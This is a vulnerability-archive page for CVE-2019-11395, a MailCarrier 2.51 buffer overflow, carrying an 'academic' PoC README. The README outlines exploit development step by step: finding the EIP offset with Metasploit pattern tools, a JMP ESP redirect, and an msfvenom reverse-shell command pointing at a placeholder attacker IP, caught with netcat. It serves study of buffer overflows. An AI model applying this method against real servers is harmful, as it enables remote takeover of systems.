目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1310

100%
请我们喝杯咖啡

CVE-2019-11395 PoC — Taps Lab MailCarrier 缓冲区错误漏洞

来源
https://github.com/RafaelBicas/CVE-2019-11395
关联漏洞
标题:Taps Lab MailCarrier 缓冲区错误漏洞 (CVE-2019-11395)
Description:Taps Lab MailCarrier是韩国Taps Lab公司的一款基于Windows Server平台的邮件服务器。该产品支持SMTP、POP3和IMAP等协议。 Taps Lab MailCarrier 2.51版本中存在缓冲区溢出漏洞。该漏洞源于网络系统或产品在内存上执行操作时,未正确验证数据边界,导致向关联的其他内存位置上执行了错误的读写操作。攻击者可利用该漏洞导致缓冲区溢出或堆溢出等。
Description
Proof of concept with the academic purpose to understand the Buffer Overflow vulnerability using as background the CVE-2019-11395
介绍
# CVE-2019-11395

## Overview

This Proof of Concept (PoC) demonstrates a **Buffer Overflow vulnerability** in MailCarrier 2.51, allowing remote attackers to execute arbitrary code via a long string. The vulnerability can be exploited using the following processes:

- `SMTP RCPT TO`
- `POP3 USER`
- `POP3 LIST`
- `POP3 TOP`
- `POP3 RETR`

The project aims to provide an **academic approach** to understanding how Buffer Overflow works.

---

## ⚠️ Warnings

Before running any tests, **never use your production environment** for initial experimentation. Instead, create a **lab setup** similar to your production environment to **avoid any issues or unintended consequences**.

---

## 🔧 Preparation

### 1. Discover the Vulnerability
- Use the **fuzzing technique** to determine the approximate number of bytes required to break the application.

### 2. Find the Offset
- Once the crash occurs, use:
  ```bash
  msf-pattern_create -l <number_of_bytes>

This helps determine the Offset, which is the exact number of bytes needed to overwrite the `EIP`.
- Use the following command to confirm the Offset
  ```bash
  msf-pattern_offset -q <bytes_on_EIP_register> -l <number_of_bytes>
This identifies the exact byte count required to control the `EIP`.

### 3. Find a JMP or CALL Instruction
- Locate an instruction using:
  ```bash
  JMP ESP
  CALL ESP
We will use this address to redirect execution. Be cautious with ASLR, SafeSEH, or other protection mechanisms.

### 4. Identify bad chars
- Use the Mona tool within Immunity Debugger to check for bad characters.

### 5. Generate Shellcode
- Create shellcode while excluding bad characters:
  ```bash
  msfvenom -p <shellcode> LHOST=<Attacker_IP> LPORT=443 -b "<badchars_list>" exitfunc=thread -f python

### 6. Add NOPs
- Insert `NOP` (`\x90`) instructions into the payload to improve stability.

### 7. Establish a connection
- Use `netcat` (`nc`) to create a reverse shell and connect to the target.
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →